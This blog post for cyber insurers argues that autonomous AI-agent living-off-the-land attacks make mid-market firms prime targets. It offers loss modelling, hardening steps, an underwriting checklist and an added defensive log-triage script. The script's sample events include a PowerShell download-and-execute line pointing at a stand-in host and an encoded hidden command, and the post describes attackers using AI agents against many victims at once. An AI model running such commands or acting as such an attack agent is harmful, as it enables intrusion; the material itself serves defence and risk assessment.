The Mid-Market Crosshairs: How LOTL 2.0 Eliminates the "Too Small to Target" Protection

Analysis of why mid-market organizations (€50M–€500M revenue) are the primary targets of the LOTL 2.0 shift, how attacker economics have fundamentally changed, and what this means for cyber insurance portfolio risk. Includes scenario modeling for underwriters.

There was an implicit protection that mid-market organizations enjoyed in the cyber threat landscape: they were too small to justify the cost of a sophisticated human attacker. That protection is evaporating, and most risk models haven’t caught up.

The Economic Model That Protected Mid-Market

The Old Attacker Economics

For a financially motivated threat actor, every target is a business decision. The calculation was straightforward:

  • Revenue per target: Ransomware payment or BEC theft, typically $50K–$500K for mid-market organizations
  • Cost per target: Skilled operator time ($150–400/hour), infrastructure, and opportunity cost
  • Time per target: Weeks of reconnaissance, initial access, lateral movement, and execution
  • Success rate: 60–80% for dedicated campaigns against mid-market targets with weak defenses

The math worked like this: a skilled operator generating $200K per successful compromise, with a 70% success rate, expects roughly $140K per target; spread over 3–4 weeks per target, that is approximately $35K per week in expected revenue. That’s good money, but it limits the operator to roughly 12–15 targets per year.

Given this constraint, the rational attacker targeted organizations where the expected revenue justified the time investment. A $50M revenue company with a $100K ransomware demand was marginal. A $500M+ enterprise with a $2M+ demand was clearly worth the effort.

The New Attacker Economics

Autonomous LOTL attacks change the equation fundamentally:

  • Revenue per target: Same ($50K–$500K for mid-market)
  • Cost per target: Compute costs — estimated $1–10 per target for agent execution
  • Time per target: Hours instead of weeks (agent operates continuously)
  • Success rate: Potentially higher — agents don’t make human errors, don’t get impatient, execute consistently
  • Parallelism: A single attacker can deploy agents against 100+ targets simultaneously

The new math: 100 parallel agent operations, each costing $5 in compute, with a 50% success rate and $150K average ransom = $7.5M in expected revenue for $500 in compute costs. The mid-market “too small to target” calculation no longer applies.

Why Mid-Market Is the Sweet Spot

Mid-market organizations sit at the intersection of three conditions that make them ideal LOTL 2.0 targets:

1. Sufficient Assets to Be Profitable

Mid-market companies have enough revenue, data, and operational dependency on IT systems to generate meaningful ransom payments or BEC theft. A €200M manufacturer that can’t ship product for two weeks will pay a $500K ransom without hesitation. That’s a worthwhile return for $5 in attacker compute costs.

2. Insufficient Security to Resist LOTL

Enterprise organizations have dedicated security teams, 24/7 SOC operations, and sophisticated detection capabilities. Mid-market organizations typically have:

  • IT generalists who handle security as part of broader responsibilities
  • Basic endpoint protection (antivirus, maybe basic EDR) without behavioral analytics
  • Limited or no SIEM — logs exist but aren’t actively monitored
  • Flat networks with minimal segmentation
  • Service accounts with standing privileges and no monitoring
  • No dedicated incident response capability

This is precisely the security posture that LOTL attacks exploit most effectively.

3. Sufficient Insurance Coverage to Be Worth Targeting

Cyber insurance has been widely adopted in the mid-market, particularly in sectors with regulatory requirements or customer contractual obligations. This means:

  • Insureds have coverage limits that justify the attacker’s effort
  • Incident response and forensic costs are covered, creating less resistance to engaging responders (which attackers sometimes exploit for intelligence)
  • The insurance market has collected sufficient data about mid-market organizations (through applications and claims) to create a rich intelligence pool

The Portfolio Risk for Insurers

For cyber insurers, the mid-market concentration risk is the most significant implication of LOTL 2.0.

Frequency Shock Scenario

Consider a portfolio of 500 mid-market cyber policies with a historical annual claims frequency of 8–12% (40–60 claims per year). If LOTL 2.0 enables parallel targeting that increases attack frequency against this segment by 50%, the portfolio generates 60–90 claims per year.

At an average claim cost of $350K (including BI, forensic, and ransomware payment), the difference between 40 claims ($14M) and 90 claims ($31.5M) is $17.5M — more than double the expected loss.

Correlation Risk

Traditional cyber insurance models assume that claims are largely independent events — one insured getting hit with ransomware doesn’t meaningfully affect the probability of another insured getting hit. LOTL 2.0 breaks this assumption:

  • A single attacker deploying agents against 100+ targets in parallel creates correlated claims events
  • Sector-specific targeting (e.g., manufacturers, healthcare providers) concentrates claims within specific insured segments
  • Temporal clustering — if multiple insureds in a portfolio are hit within the same week, it may overwhelm claims handling capacity and increase adjustment costs
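To put the frequency shock and the correlation point side by side, here is an added Python simulation of the 500-policy book described above. It is not from the post or its authors. The portfolio size, the 8–12% historical frequency (midpoint used), the $350K average claim, the 50% frequency uplift, the 50% agent success rate and the 100-target campaign size are the post's figures; the assumption that campaigns hitting the book arrive as a Poisson process, calibrated so the correlated scenario has the same expected claim count as the plain frequency shock, is mine.

```python
"""Portfolio scenario model: frequency shock vs. correlated campaigns.

Added illustration, not from the post: a Monte Carlo over the post's
500-policy mid-market book. Inputs marked "post" come from the text; the
campaign mechanics are a constructed assumption used to show why
correlation, not just frequency, drives the tail of the loss distribution.
"""
import math
import random
import statistics

POLICIES = 500              # post: portfolio of 500 mid-market policies
BASE_FREQ = 0.10            # post: midpoint of the 8-12% historical annual frequency
CLAIM_COST = 350_000        # post: average claim cost in USD (BI, forensics, ransom)
FREQ_SHOCK = 0.50           # post: +50% frequency under LOTL 2.0
AGENT_SUCCESS = 0.50        # post: 50% success rate per agent operation
CAMPAIGN_SIZE = 100         # post: one attacker runs agents against 100+ targets at once


def poisson(lam: float, rng: random.Random) -> int:
    """Sample a Poisson count (Knuth's multiplication method)."""
    limit = math.exp(-lam)
    k, p = 0, 1.0
    while True:
        p *= rng.random()
        if p < limit:
            return k
        k += 1


def simulate_independent(n_years: int, freq: float, rng: random.Random) -> list[int]:
    """Annual claim counts when each insured is hit independently (Binomial)."""
    return [sum(rng.random() < freq for _ in range(POLICIES)) for _ in range(n_years)]


def simulate_correlated(n_years: int, campaign_rate: float, rng: random.Random) -> list[int]:
    """Background independent claims plus parallel campaigns landing on this book.

    Constructed assumption: each campaign aims agents at CAMPAIGN_SIZE insureds
    of the portfolio and succeeds against each with AGENT_SUCCESS; the number
    of campaigns per year is Poisson(campaign_rate).
    """
    years = []
    for _ in range(n_years):
        claims = sum(rng.random() < BASE_FREQ for _ in range(POLICIES))
        for _ in range(poisson(campaign_rate, rng)):
            claims += sum(rng.random() < AGENT_SUCCESS for _ in range(CAMPAIGN_SIZE))
        years.append(min(claims, POLICIES))  # one claim per insured per year in this model
    return years


def summarize(claims: list[int]) -> dict:
    """Mean claim count, mean annual loss and 99th-percentile annual loss (USD)."""
    losses = sorted(c * CLAIM_COST for c in claims)
    p99 = losses[min(len(losses) - 1, int(0.99 * len(losses)))]
    return {"mean_claims": statistics.mean(claims),
            "mean_loss": statistics.mean(losses),
            "p99_loss": p99}


def run_scenarios(n_years: int = 2000, seed: int = 7) -> dict:
    """Historical book, the post's +50% frequency shock, and a correlated book
    calibrated to the same expected claim count as the shock."""
    rng = random.Random(seed)
    shocked_freq = BASE_FREQ * (1 + FREQ_SHOCK)
    extra_claims = POLICIES * BASE_FREQ * FREQ_SHOCK                 # 25 extra claims per year
    campaign_rate = extra_claims / (CAMPAIGN_SIZE * AGENT_SUCCESS)   # 0.5 campaigns per year
    return {
        "historical": summarize(simulate_independent(n_years, BASE_FREQ, rng)),
        "frequency_shock": summarize(simulate_independent(n_years, shocked_freq, rng)),
        "correlated_campaigns": summarize(simulate_correlated(n_years, campaign_rate, rng)),
    }


if __name__ == "__main__":
    for name, stats in run_scenarios().items():
        print(f"{name:22s} mean claims {stats['mean_claims']:6.1f}  "
              f"mean loss ${stats['mean_loss'] / 1e6:5.1f}M  "
              f"p99 loss ${stats['p99_loss'] / 1e6:5.1f}M")
```

Run it and read the p99 column rather than the mean: the two LOTL scenarios both average close to 75 claims, yet the correlated book's 99th-percentile year sits far above the independent one's, because a year with two or three parallel campaigns lands 100–150 extra claims at once. That gap, invisible in a frequency-only load, is the reinsurance "model uncertainty" point expressed in numbers.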

The Reinsurance Implications

For reinsurers and ILS (Insurance-Linked Securities) markets, the LOTL 2.0 mid-market targeting creates:

  • Higher aggregate loss potential from frequency-driven events
  • Reduced diversification benefit from mid-market portfolios that were previously considered lower-risk
  • Model uncertainty — historical loss data doesn’t reflect the new attacker economics

What Mid-Market Insureds Should Be Doing

For risk engineers and loss control teams working with mid-market insureds, the priority recommendations are:

Immediate Actions (0–30 days)

  1. Enable PowerShell logging on all endpoints — this is free, built into Windows, and provides critical visibility
  2. Enforce MFA on all privileged accounts — including service accounts where technically feasible
  3. Audit local admin rights — reduce the number of accounts with administrative privileges to the minimum necessary
  4. Enable advanced audit policies — particularly process creation (Event ID 4688) with command-line logging

Short-Term Investments (30–90 days)

  1. Deploy or upgrade EDR — ensure behavioral detection capabilities are active, not just signature matching
  2. Implement network segmentation — at minimum, separate critical systems from general user networks
  3. Establish SIEM monitoring — even a basic cloud SIEM with LOTL-specific use cases is better than none
  4. Create a service account inventory — document every service account, its purpose, and required permissions
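What the logging steps above actually buy a defender becomes clear once the records are queried. The following Python script is an added illustration, not code from the post or its authors: it runs a few LOTL-specific use cases of the kind the SIEM item refers to over constructed process creation (4688, with command line) and PowerShell script block (4104) events, and uses a service account inventory entry to judge whether a service account is behaving according to its documented profile. All event records, account names, host names and the maintenance window are constructed samples; the field names follow the Windows event schema.

```python
"""Minimal LOTL triage over constructed Windows event records.

Added illustration, not from the post. Every event below is a constructed
sample; field names follow the Windows 4688 / 4104 event schema, and the
service account profile and maintenance window are assumptions.
"""
import re

# Constructed: the kind of entry a service account inventory should hold
SERVICE_ACCOUNTS = {"svc_backup": {"allowed_hosts": {"powershell.exe"}, "window": range(1, 5)}}
OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
ENCODED_FLAG = re.compile(r"(?i)\s-e(ncodedcommand|nc|c)?\b")
DOWNLOAD_CRADLE = re.compile(r"(?i)(downloadstring|invoke-webrequest|iwr\b|net\.webclient)")
INLINE_EXEC = re.compile(r"(?i)\b(iex|invoke-expression)\b")


def image_name(path: str) -> str:
    """Strip the directory from a Windows image path and normalise case."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate_4688(ev: dict) -> list[str]:
    """Use cases over one process creation event."""
    findings = []
    child, parent = image_name(ev["NewProcessName"]), image_name(ev["ParentProcessName"])
    cmd = ev.get("CommandLine", "")
    user, hour = ev["SubjectUserName"].lower(), int(ev["TimeCreated"][11:13])
    if not cmd:
        # Without the command line, 4688 shows that PowerShell ran, not what it ran.
        # The capture is the "Include command line in process creation events" policy
        # (ProcessCreationIncludeCmdLine_Enabled under the System\Audit policy key).
        findings.append("no command line captured: enable command-line auditing")
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        findings.append(f"{parent} spawned {child}")
    if child in {"powershell.exe", "pwsh.exe"} and ENCODED_FLAG.search(cmd):
        findings.append("encoded PowerShell command")
    profile = SERVICE_ACCOUNTS.get(user)
    if profile and child in SCRIPT_HOSTS and (
            child not in profile["allowed_hosts"] or hour not in profile["window"]):
        findings.append(f"service account {user} ran {child} outside its documented profile")
    return findings


def evaluate_4104(ev: dict) -> list[str]:
    """Use cases over one script block logging event."""
    text = ev["ScriptBlockText"]
    findings = []
    if DOWNLOAD_CRADLE.search(text) and INLINE_EXEC.search(text):
        findings.append("download-and-execute script block")
    if re.search(r"(?i)frombase64string", text):
        findings.append("base64 decoding in script block")
    return findings


RULES = {4688: evaluate_4688, 4104: evaluate_4104}


def triage(events: list[dict]) -> list[dict]:
    """Return only the events that hit at least one use case, in arrival order."""
    hits = []
    for ev in events:
        findings = RULES.get(ev["EventID"], lambda _: [])(ev)
        if findings:
            hits.append({"TimeCreated": ev["TimeCreated"], "EventID": ev["EventID"],
                         "user": ev["SubjectUserName"], "findings": findings})
    return hits


SAMPLE_EVENTS = [  # constructed records, not real logs
    {"EventID": 4688, "TimeCreated": "2026-03-02T09:14:05", "SubjectUserName": "jdoe",
     "ParentProcessName": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -enc QQBBAEEAQQA="},      # decodes to "AAAA"
    {"EventID": 4104, "TimeCreated": "2026-03-02T09:14:06", "SubjectUserName": "jdoe",
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"},
    {"EventID": 4688, "TimeCreated": "2026-03-02T14:30:00", "SubjectUserName": "svc_backup",
     "ParentProcessName": r"C:\Windows\System32\services.exe",
     "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c dir \\fileserver01\finance"},
    {"EventID": 4688, "TimeCreated": "2026-03-02T02:10:00", "SubjectUserName": "svc_backup",
     "ParentProcessName": r"C:\Windows\System32\services.exe",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\nightly-backup.ps1"},
    {"EventID": 4688, "TimeCreated": "2026-03-02T10:02:00", "SubjectUserName": "jdoe",
     "ParentProcessName": r"C:\Windows\explorer.exe",
     "NewProcessName": r"C:\Windows\System32\notepad.exe"},  # CommandLine absent: audit gap
    {"EventID": 4104, "TimeCreated": "2026-03-02T02:10:01", "SubjectUserName": "svc_backup",
     "ScriptBlockText": "Compress-Archive -Path D:\\Data -DestinationPath E:\\Backups\\nightly.zip"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["TimeCreated"], hit["EventID"], hit["user"], "; ".join(hit["findings"]))
```

Two of the six sample records are the routine nightly backup and pass cleanly, which is the point of pairing the logs with an inventory: the same service account running the same script host is noise inside its documented window and a finding outside it. The record with no command line is reported as a configuration gap rather than silently ignored, since a 4688 stream without command lines is exactly the "logs exist but aren't actively monitored" posture in another form.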

Strategic Investments (90+ days)

  1. Implement PAM — just-in-time privileged access for all administrative functions
  2. Deploy behavioral analytics — UEBA that establishes baselines and alerts on deviations
  3. Develop incident response capability — either internal or through a retained IR firm with LOTL expertise
  4. Conduct purple team exercises — specifically testing LOTL attack scenarios against current defenses

The Underwriter’s Mid-Market Checklist

When reviewing mid-market applications, use this rapid assessment to gauge LOTL 2.0 exposure:

| Question | Red Flag Answer | Green Flag Answer |
| --- | --- | --- |
| "Do you have dedicated security staff?" | "IT handles security" | Named CISO, security team |
| "Is PowerShell logging enabled?" | "We’re not sure" | "Yes, script block logging, forwarded to SIEM" |
| "What percentage of accounts have local admin?" | "Most users" or "Not sure" | "< 5%, audited quarterly" |
| "Do you have a PAM solution?" | "No" or "What’s PAM?" | "Yes, JIT access for all admin" |
| "How do you detect lateral movement?" | "We have a firewall" | "NDR + behavioral analytics on east-west traffic" |
| "When did you last test for LOTL scenarios?" | "Never" or "We do annual pen tests" | "Purple team exercise within last 6 months" |
| "Do you have MFA on service accounts?" | "Service accounts are excluded" | "Yes, managed service accounts with automatic rotation" |

The Pricing Reality Check

If your mid-market book was priced based on historical loss frequency data from 2020–2024, those prices likely understate the risk under LOTL 2.0 conditions. The question isn’t whether to adjust pricing — it’s how much and how quickly.

Conservative approach: apply a 10–20% frequency load to mid-market segments based on the attacker economics shift.

Aggressive approach: re-underwrite the entire mid-market book using LOTL-specific control criteria, with significant surcharges for organizations that lack behavioral monitoring and identity-based controls.

The right answer is probably somewhere in between — but the direction is clear: mid-market cyber risk is underpriced relative to the LOTL 2.0 threat landscape.


This is the fourth post in our LOTL 2.0 Series. Previous: The Detection Gap Analysis → | Next: The LOTL 2.0 Incident Tracker — real-world cases and evidence →
